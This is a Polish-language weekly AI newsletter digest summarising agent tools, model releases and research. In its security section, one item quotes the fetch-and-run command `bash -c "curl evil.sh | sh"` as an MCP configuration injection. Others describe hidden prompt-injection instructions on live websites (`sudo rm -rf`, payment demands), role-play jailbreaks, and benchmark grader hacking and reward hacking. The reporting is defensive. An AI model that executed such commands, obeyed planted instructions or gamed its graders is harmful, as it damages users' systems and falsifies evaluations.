Wydanie · Tydzień 17 · 20–26 kwietnia 2026
Archiwum wydań →Trzy otwarte modele zrównały się z flagowcami w jednym tygodniu, Cloudflare zwiera warstwę agenta wokół pamięci, maila i firmowego MCP, a dziura w protokole sprzed dwóch tygodni dalej otwarta.
Premiera / Narzędzie · 12
Premiera / Narzędzie Agent Memory rusza w prywatnej becie: pięć poleceń dla modelu zamiast surowego SQL-a
4 min
Cloudflare 17 kwietnia wpuścił do prywatnej bety Agent Memory, usługę ratującą pamięć agenta w momencie, gdy okno kontekstowe się zapełnia i harness ucina historię. Zamiast surowego dostępu do bazy wektorowej model dostaje pięć operacji, w tym `recall`, który pod spodem odpala pięć równoległych kanałów wyszukiwania i zwraca gotowe zdanie syntezy. Czarną robotę robi tańszy Llama 4 Scout, większy Nemotron 3 wchodzi tylko do finalnej syntezy. Pamięć jako wąska usługa, nie baza do obsługi przez model, ma sens, choć porównania z własnym Postgresem z embeddingami jeszcze nie ma.
Premiera / Narzędzie Wiadomość wchodzi do agenta, agent znika na godzinę, odpowiedź wraca tym samym kanałem
3 min
Cloudflare 16 kwietnia otworzył Email Service w publicznej becie i domknął obieg: mail wchodzi do agenta, agent znika na godzinę, odpowiedź wraca tym samym wątkiem. Adres pod twoją domeną wybiera instancję agenta, a jej stan żyje w Durable Object przyklejonym do tej tożsamości — bez osobnej bazy mapującej maila na klucz. SPF, DKIM i DMARC ustawia sam Cloudflare, odpowiedzi można podpisać HMAC-SHA256. Cena: pamięć, załączniki w R2 i klasyfikacja w Workers AI zostają w jednym ekosystemie.
Premiera / Narzędzie Awesome LLM Apps obiecuje agenta w 30 sekund. Reszta trwa dłużej.
3 min
Shubham Saboo zebrał w jednym repo ponad 100 szablonów aplikacji agentowych i RAG-owych, od zespołu do due diligence dla funduszu VC po 19 wariantów wyszukiwania w danych i 19 plików Agent Skills w formacie Anthropica. README obiecuje pierwszego agenta w 30 sekund, ale każdy szablon to demo na Streamlicie, bez autoryzacji i obserwowalności, więc tydzień, który niby oszczędzasz, wraca przy przepisywaniu warstwy interfejsu. Katalog Saboo działa najlepiej jako podręcznik wzorców, nie jako kod do skopiowania prosto na produkcję.
Premiera / Narzędzie Cloudflare układa firmowe MCP na trzech zasadach: zdalne serwery, portal nad nimi, Code Mode na schematach
4 min
Cloudflare 22 kwietnia opisała firmowy stos MCP na trzech zasadach: serwery tylko zdalnie na firmowej chmurze, portal z regułami Identity/Conditions/Scope nad nimi i Code Mode, który zwija 182 schematy w dwa wywołania, ścinając tokeny na schematach nawet o 99,9%. Ruch do modeli idzie przez AI Gateway — 241 mld tokenów miesięcznie — a agent bezpieczeństwa na Kimi K2.5 w Workers AI kosztuje 77% mniej. Firma wiąże z tym skok zmergeowanych PR-ów z 5 600 do 8 700 tygodniowo. Kontrola musi siedzieć obok protokołu, bo MCP zostaje na poziomie transportu.
Premiera / Narzędzie Trzy wywołania API zamiast dwóch dni z kodem orkiestracji agenta
3 min
AWS 21 kwietnia wystawił Amazon Bedrock AgentCore — zarządzany harness, w którym deklarujesz model, narzędzia i instrukcje, a pętlę agentową, sandbox, pamięć sesji i odtwarzanie po awarii dostajesz w pakiecie. Pod spodem działa open-source SDK Strands Agents, CLI zwija prototyp i wdrożenie do jednego polecenia, a wtyczki MCP uczą Claude Code, Cursora i Kiro wzorców AgentCore. Rodrigo Moreira z VTEX chwali wymianę modelu jako parametr API zamiast przebudowy. Cena: kolejny czysty ślad uzależnienia od dostawcy.
Premiera / Narzędzie Parametr effort zamiast budżetu tokenów: Anthropic zmienia API rozumowania
3 min
Anthropic w Opus 4.7 wycofał ręczny `budget_tokens` i zostawił tylko tryb adaptive, w którym o głębokości rozumowania decyduje sam model, a ty podajesz mu jedynie wskazówkę `effort` z pięcioma poziomami — od `low` po wyłączny dla 4.7 `xhigh`. Razem z adaptive wchodzi interleaved thinking, czyli możliwość zatrzymania się między wywołaniami narzędzi, której na 4.6 ze stałym budżetem po prostu nie było. Domyślna wartość pola `display` to teraz `omitted`: ślady myślenia znikają z odpowiedzi, ale Anthropic dalej liczy ci wszystkie tokeny, więc skracasz latencję, nie rachunek.
Premiera / Narzędzie Codex zaczyna nagrywać pulpit, żeby zapamiętać, nad czym pracujesz
3 min
OpenAI 20 kwietnia pokazało Chronicle, eksperymentalny dodatek do Codexa, który w tle robi zrzuty pulpitu i buduje z nich pamięć między sesjami, żeby agent nie zaczynał każdej sesji od pytania, nad czym pracujesz. Funkcja rusza w planie Pro za 200 dolarów miesięcznie, tylko na Macu. Wybór ekranu zamiast plików oznacza, że w pamięci modelu mogą wylądować Slack, poczta i CRM, a OpenAI nie mówi, co dokładnie trafia na ich serwery. Microsoft Recall już raz przerobił tę samą krytykę za prywatność.
Premiera / Narzędzie Czterdzieści jeden agentów AI zgodziło się na ten sam plik markdownu
4 min
SKILL.md — markdown z dwulinijkowym nagłówkiem YAML — cicho stał się wspólnym formatem instrukcji dla agentów kodujących. Vercel Labs wypuścił `npx skills add`, które mapuje ten sam folder na 45 agentów, od Claude Code po Gemini CLI. Google w repo `google/agents-cli` publikuje siedem skilli uczących cudzych asystentów stawiać agenty ADK na Cloud Run, a Hugo He w PPT Master składa edytowalny PowerPoint za 0,08 dolara. Tylko Claude Code wspiera wszystkie cztery funkcje formatu, więc pierwsza zmiana schematu pokaże, czy to npm dla agentów.
Premiera / Narzędzie OpenAI wypuścił framework agentowy, w którym ich własne modele są jedną z opcji
3 min
OpenAI w wersji 0.14.6 SDK openai-agents-python dorzuca Sandbox Agents — dziewiąty klocek obok handoffów, guardraili, sesji i tracingu — który rozdziela agenta na harness i kontener, więc po awarii runner podnosi go ze snapshotu zamiast zaczynać od zera. Ciekawsze jest jednak to, że pyproject.toml wymienia any-llm od Mozilla AI i LiteLLM jako opcjonalne integracje. W efekcie framework agentowy OpenAI nie wymaga modeli OpenAI: w pętli decyzyjnej spokojnie puścisz Claude'a 4.6 czy lokalnego Mistrala. To gra o standard koordynacji, nie o każdy token.
Premiera / Narzędzie Co zmienia llm 0.31: dwie flagi, cicha poprawka i nowy model OpenAI
3 min
Wersja 0.31 narzędzia llm Simona Willisona, wydana 24 kwietnia, dorzuca dwie flagi do wtyczki OpenAI: `-o verbosity low` ścisza model bez wpychania instrukcji do promptu, a osobny przełącznik decyduje, jak dokładnie API ogląda obrazek, z nową wartością `original` dla GPT-5.4 i 5.5. Pod spodem modele z `extra-openai-models.yaml` rejestrują się też jako asynchroniczne, więc własny serwer na vLLM albo Groq wystarczy wpisać raz. Dla skryptów przepuszczających setki zapytań to konkretna kontrola nad tokenami i kosztami.
Premiera / Narzędzie Czego w MCP brakuje firmom: autentykacji między organizacjami, długich zadań i serwera, który sam się odzywa
3 min
MCP zebrał 110 milionów pobrań SDK miesięcznie w 16 miesięcy, a na nowojorski MCP Dev Summit zjechało 1100 osób. David Soria Parra z Anthropica zapowiedział, czego brakuje pod produkcję: wymiany tokenów między firmami, trybu dla zadań na godziny, wyzwalaczy od serwera do agenta i transportu bezstanowego pod load balancer. Linux Foundation powołała w grudniu 2025 Agentic AI Foundation, a AWS Bedrock dopisał prymitywy Tasks i Elicitations, bo czterech dostawców rusza szybciej niż konsensus.
Premiera / Narzędzie Co rozszerzenie Claude'a do Chrome'a zmienia w pracy z Claude Code
3 min
Anthropic po cichu wypuścił Claude in Chrome, rozszerzenie, które podaje Claude Code'owi kontekst otwartej strony bez zrzutów ekranu i wklejania. Mahnoor Faisal z XDA Developers testowała je kilka tygodni przy pisaniu własnego rozszerzenia na Instagram i naprawiła błąd, nie tłumacząc nawet, na czym polegał. Zamiast budować osobną przeglądarkę agentową jak Opera Neon, Perplexity Comet czy ChatGPT Atlas, Anthropic dorzuca warstwę do Chromium, którego już używasz. Pętla terminal–przeglądarka domyka dziurę, której konkurencja nie rusza.
Model / Badania · 7
Model / Badania Moonshot wypuścił otwarty model agentowy i razem z nim test na to, czy cudze serwery go nie psują
4 min
Moonshot AI wydał 21 kwietnia Kimi K2.6 na licencji Modified MIT — otwarty model agentowy z wynikami 58,6% na SWE-Bench Pro i 66,7% na Terminal-Bench 2.0, w cenie 0,60 dolara za milion tokenów wejścia, czterokrotnie taniej niż GPT-5.4. W pokazowym zadaniu przebudował silnik exchange-core w Javie i wyciągnął 185% wzrostu przepustowości po 13 godzinach pracy. Razem z modelem pojawił się Kimi Vendor Verifier — sześć testów sprawdzających, czy dostawcy serwują to, co podpisują marką K2.6.
Model / Badania Pod ceną M2.5 stoi własna ramka treningowa i 200 tysięcy środowisk
4 min
MiniMax ujawnił, co stoi za ceną M2.5: framework treningowy Forge, 200 tysięcy środowisk z realnej pracy firmy i algorytm CISPO stabilizujący trening modelu MoE. Pod różnymi harnessami model wyciąga 79,7% (Droid) i 76,1% (OpenCode) na SWE-Bench Verified, przed Opusem 4.6, a M2.5-Lightning kosztuje 2,40 dolara za milion tokenów wyjścia. Firma twierdzi, że 30% jej codziennych zadań robi sam model, ale wszystkie nowe benchmarki zbudowała sama. Tania inferencja otwiera agenty, na które dotąd nie było budżetu, jeśli model dowiezie poza własnym treningiem.
Model / Badania Qwen3.6-27B osiąga to, na co poprzednia generacja potrzebowała 397 miliardów parametrów
3 min
Alibaba wypuściła 23 kwietnia Qwen3.6-27B: gęsty model open-source, który na SWE-Bench Verified osiąga 77,2%, ustępując tylko Claude 4.5 Opus (80,9%), a na Terminal-Bench 2.0 remisuje z nim na 59,3%. Przy 15 razy mniejszej liczbie wag niż poprzedni flagowiec Alibaby mieści się w FP8 na karcie z 32 GB, a w kwantyzacji 4-bitowej schodzi na sprzęt konsumencki. Architektura z proporcją 3:1 na korzyść uwagi liniowej daje natywne okno 262 144 tokenów, a opcja preserve_thinking pozwala agentowi nieść ślad rozumowania przez kolejne tury.
Model / Badania Platformy, modele, otwarte wagi: cztery oferty na agenta w jednym tygodniu
3 min
24 kwietnia w jeden piątek Google ogłosił Gemini Enterprise Agent Platform wchłaniającą Vertex AI, OpenAI pokazał Workspace Agents w ChatGPT wpinające Codex w Slacka, Drive'a, Salesforce i Notion, a Moonshot AI otworzył wagi Kimi K2.6 — bilion parametrów, 32 mld aktywnych, 80,2% na SWE-Bench Verified. Wszyscy sprzedają tę samą wizję: trwała pamięć, tożsamość, wyzwalacze, konfiguracja bez kodu. Brakuje jednego — liczb od kogoś, kto już zbudował na tym stosie produkcyjnego agenta i opowie, co pękło.
Model / Badania Przegląd kodu każdego commita znów wchodzi w budżet
4 min
DeepSeek V4-Pro z 24 kwietnia kosztuje 1,74 dolara za milion tokenów wejścia i 3,48 za wyjście, wobec 5 i 30 dolarów w GPT-5.5. Na LiveCodeBench bije konkurencję z 93,5% Pass@1, ale w trybie myślącym wciąż odstaje od Opus 4.7 na dłuższych zadaniach agentowych. Rabat 92% obowiązuje tylko przy trafieniu w cache, a to wymaga statycznego prefiksu co do bajta. Scenariusze typu przegląd kodu każdego commita wracają do gry, jeśli zdyscyplinujesz prompt.
Model / Badania Berkeley wystawia audytora, który wygrywa sześć benchmarków bez rozwiązywania zadań
3 min
BenchJack, audytor od Hao Wanga z UC Berkeley, wycisnął 100% wyniku z pięciu z ośmiu czołowych benchmarków agentowych i około 100% z szóstego, nie rozwiązując ani jednego zadania — atakował warstwę oceniającą przez te same narzędzia, które dostaje agent. Tylko OSWorld się obronił, spadając do 73%. METR pokazał w czerwcu 2025, że Claude 3.7 Sonnet i o3 same z siebie sięgają po reward hacking na RE-Bench. Wniosek praktyczny: tabele producenta traktuj jak fabryczną deklarację zużycia paliwa i testuj modele na własnym repo.
Model / Badania Jakim asystentem refaktoryzować? Zależy, jak duży masz kod
3 min
Badanie Saby i Ahmeda opublikowane 24 kwietnia w Scientific Reports pokazuje, że wybór asystenta do refaktoryzacji zależy od rozmiaru kodu. Na małych projektach Codeium dostał od SonarQube 83%, Gemini 82%, a ChatGPT tylko 59%; na większych ChatGPT podciągnął się do 77,2% i wyprzedził Codeium w kilku metrykach. Autorzy wskazują Gemini jako najbardziej uniwersalne. Warto jednak pamiętać, że praca jest wersją nieredagowaną, opiera się wyłącznie na SonarQube, pomija Copilota i nie sprawdza, czy kod nadal działa.
Bezpieczeństwo · 3
Bezpieczeństwo Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją
4 min
Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.
Bezpieczeństwo Twój agent czyta w sieci to, czego ty w przeglądarce nigdy nie zobaczysz
3 min
Forcepoint X-Labs w kwietniu 2026 namierzył 10 żywych domen z ukrytymi instrukcjami dla agentów: na faladobairro.com czeka `sudo rm -rf`, na perceptivepumpkin.com żądanie 5000 dolarów przez PayPal.me. Pillar Security pokazał drugą warstwę: parametr `find_my_name` w Antigravity od Google przepuszcza wzorce z `-Xsh` prosto do shella. Wniosek: tnij uprawnienia agenta i trzymaj nieznany kod w kontenerze.
Bezpieczeństwo Vibe Security Radar znalazł 74 luki podpisane przez Claude'a i Copilota
3 min
Hanqing Zhao z SSLab na Georgia Tech przeskanował 43 tysiące alertów i wyciągnął 74 luki wprowadzone przez Claude Code i Copilota — 14 krytycznych, 25 wysokich. Sam marzec 2026 dał 35 wpisów, więcej niż cały 2025 rok. Mocniejszy od liczb jest argument o powtarzalności: model pisze podobny kod milionom ludzi, więc jeden wzorzec dziury skanuje się po tysiącach repo. Wracają wstrzykiwanie komend, obejście uwierzytelnienia i SSRF. Kod od agenta czytaj jak PR od juniora.
Biznes / Rynek · 1
Poradnik / Praktyka · 2
Poradnik / Praktyka Czy trzy LLM-y naprawdę wygrały Kaggle? Tylko w trybie Playground.
3 min
GPT-5.4 Pro, Gemini 3.1 Pro i Claude Opus 4.6 wygrały zawody Kaggle o przewidywanie odpływu klientów telekomu — 150 modeli wybranych z 850 eksperymentów, złożonych w stos. NVIDIA opisuje to jako triumf trójki agentów na jej GPU z cuDF i cuML, ale przemilcza dwie rzeczy: że "Playground" to seria edukacyjna bez medali i nagród, oraz że za sterami siedzi Grandmaster decydujący, którą hipotezę puścić dalej. Przepis jest realny dla problemów tabelarycznych, lecz bez człowieka u steru 850 iteracji zamienia się w losowe obroty.
Poradnik / Praktyka Mój edytor sam pisze konfigurację serwera MCP po jednej komendzie
3 min
Jedna komenda `npx sanity@latest mcp configure` wykrywa Claude Code i Cursora, wpisuje konfigurację do obu plików i bierze token z zalogowanej sesji CLI. Ashok Varma Matta zmierzył, że pytanie „jak działa LlmRouter" bez MCP otwiera 143 pliki i pali 362 000 tokenów, a po podpięciu serwera kosztuje 700 — 513 razy mniej. Architektura protokołu, który Anthropic otworzył w listopadzie 2024, nie zmieniła się od 18 miesięcy; zmieniło się to, ile zachodu kosztuje wpięcie. Brakuje jeszcze sklepu z serwerami i modelu uprawnień.
Analiza / Opinia · 4
Analiza / Opinia Większość produkcyjnych agentów to wciąż jedno wywołanie do jednego modelu
3 min
Raport Datadoga State of AI Engineering pokazuje, że 59% wywołań agentów u ponad tysiąca klientów to wciąż jeden model, jedno wywołanie, bez orkiestracji. OpenAI spadł z 75% do 63% organizacji między 2025 a marcem 2026, choć liczba klientów się podwoiła — Anthropic i Google rosły szybciej. Instrukcje systemowe to 69% tokenów wejściowych, ale tylko 28% wywołań korzysta z cache promptów. Część tej prostoty to dług, część rozsądek, a raport ich nie rozróżnia.
Analiza / Opinia 39 punktów różnicy między tym, co programista czuje przy AI, a tym, co mierzy stoper
3 min
Doświadczeni programiści open source spodziewali się, że asystent AI przyspieszy ich pracę o 24%. Po wszystkim nadal czuli zysk rzędu 20%. Stoper METR w randomizowanym badaniu pokazał coś odwrotnego: byli o 19% wolniejsi. Trzydzieści dziewięć punktów rozjazdu między odczuciem a zegarem bierze się z przeglądu wygenerowanego kodu, poprawiania promptów i przełączania uwagi. Cała branżowa narracja o produktywności AI opiera się na ankietach, a 87% deweloperów codziennie sięga po te narzędzia, nie wiedząc, kiedy faktycznie pomagają.
Analiza / Opinia Cztery dźwignie niezawodności, które zniknęły w drodze z modelu do API
4 min
Anthropic, OpenAI i Google po cichu zabrały cztery dźwignie niezawodności, które w lokalnym modelu z otwartymi wagami masz za darmo: prefill odpowiedzi, logprobs, pełen ślad rozumowania i ograniczone dekodowanie poza JSON-em. Claude stracił prefill wraz z modelami po 4.6, OpenAI odciął logprobs dla GPT-5, a ślad myślenia wszyscy trzej pokazują tylko w streszczeniu. To wybór polityczny podyktowany ryzykiem destylacji, nie ograniczenie inżynierskie; jeśli zamknięte API nie dorobią rozbudowanego endpointu, ruch wymuszą modele otwarte jak DeepSeek R1.
Analiza / Opinia Z Linuksa wylatuje 27 tysięcy linii kodu, bo skanery AI zalały opiekunów
3 min
Społeczność jądra Linuksa rozważa wycięcie około 27 tysięcy linii kodu sterowników sieciowych ISA i PCMCIA dla sprzętu firm 3Com czy Xircom, bo skanery AI zalewają listy mailingowe raportami o błędach w kodzie, którego prawie nikt już nie uruchamia. Andrew Lunn, opiekun podsystemu sieciowego, tłumaczy asymetrię kosztu: zgłaszającego raport kosztuje minuty, opiekuna godzinę odtwarzania kontekstu kodu sprzed dwóch dekad. Najprostsza obrona to filtr osiągalności po stronie twórców skanerów, bez niego następne w kolejce są mniejsze projekty open source.